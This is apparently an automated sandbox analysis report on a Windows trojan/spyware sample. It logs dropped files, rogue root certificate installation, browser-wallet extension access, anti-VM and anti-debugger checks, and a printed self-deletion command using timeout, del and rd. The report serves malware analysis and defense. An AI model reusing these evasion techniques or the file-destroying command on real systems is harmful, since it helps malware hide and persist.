Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D758763 2_2_1D758763
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D794760 2_2_1D794760
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7C8760 2_2_1D7C8760
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D758680 2_2_1D758680
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7B8120 2_2_1D7B8120
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D858030 2_2_1D858030
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7B0090 2_2_1D7B0090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D733AB2 2_2_1D733AB2
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73290A 2_2_1D73290A
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73251D 2_2_1D73251D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D767810 2_2_1D767810
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D75BAB0 2_2_1D75BAB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73F160 2_2_1D73F160
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73174E 2_2_1D73174E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D763370 2_2_1D763370
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7319DD 2_2_1D7319DD
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D90AEBE 2_2_1D90AEBE
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D792EE0 2_2_1D792EE0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D776E80 2_2_1D776E80
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D8169C0 2_2_1D8169C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D84A900 2_2_1D84A900
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D82A940 2_2_1D82A940
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73481D 2_2_1D73481D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D86E800 2_2_1D86E800
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D733E3B 2_2_1D733E3B
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73AA40 2_2_1D73AA40
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73EA80 2_2_1D73EA80
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D82A590 2_2_1D82A590
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D75A560 2_2_1D75A560
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7347AF 2_2_1D7347AF
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7466C0 2_2_1D7466C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73209F 2_2_1D73209F
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7BA0B0 2_2_1D7BA0B0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\kat2B07.tmp 6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D73395E appears 81 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D733AF3 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D731F5A appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D9106B1 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D73415B appears 173 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: String function: 1D731C2B appears 47 times
Sample file is different than original file name gathered from version info
Source: 82xul16VKj.exe, 00000000.00000002.342118140.000000000018D000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342285744.0000000000324000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Uses 32bit PE files
Source: 82xul16VKj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/14@4/4
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txt Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ....................T.A..........4Z.............P..............._B.s.....4Z.......4.t...........0.......................X.................A..... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.0...p........,......................0............................................... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J....................... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .9.(.P.....................d........-......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .8.(.P.............................q/......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .7.(.P............................../......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .6.(.P..............................0......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .5.(.P..............................0......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .4.(.P..............................1......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .3.(.P..............................2......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .2.(.P.....................,.......-3......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .1.(.P..............................3......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .0.(.P.....................,........3......................e. ........................................s.... Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Console Write: .................................... .0.(.P..............................5......................e. ........................................s.... Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 82xul16VKj.exe Virustotal: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\82xul16VKj.exe "C:\Users\user\Desktop\82xul16VKj.exe"
Source: C:\Users\user\Desktop\82xul16VKj.exe Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\82xul16VKj.exe Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cryptnet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sensapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: devrtl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wbemcomn2.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: 82xul16VKj.exe Static file information: File size 1608192 > 1048576
Source: 82xul16VKj.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x12a000
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
PE file contains sections with non-standard names
Source: sqlt[1].dll.2.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EECA10 push edx; ret 0_2_02EECC1F
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEC310 push edx; ret 0_2_02EEC31B
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D731BF9 push ecx; ret 2_2_1D8D4C03
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7310C8 push ecx; ret 2_2_1D933552

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\82xul16VKj.exe File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon.png
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Stores large binary data to the registry
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp API coverage: 3.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2848 Thread sleep count: 90 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareA
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_1D732C8E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7346A6 GetProcessHeap, 2_2_1D7346A6
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_1D732C8E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7342AF SetUnhandledExceptionFilter, 2_2_1D7342AF

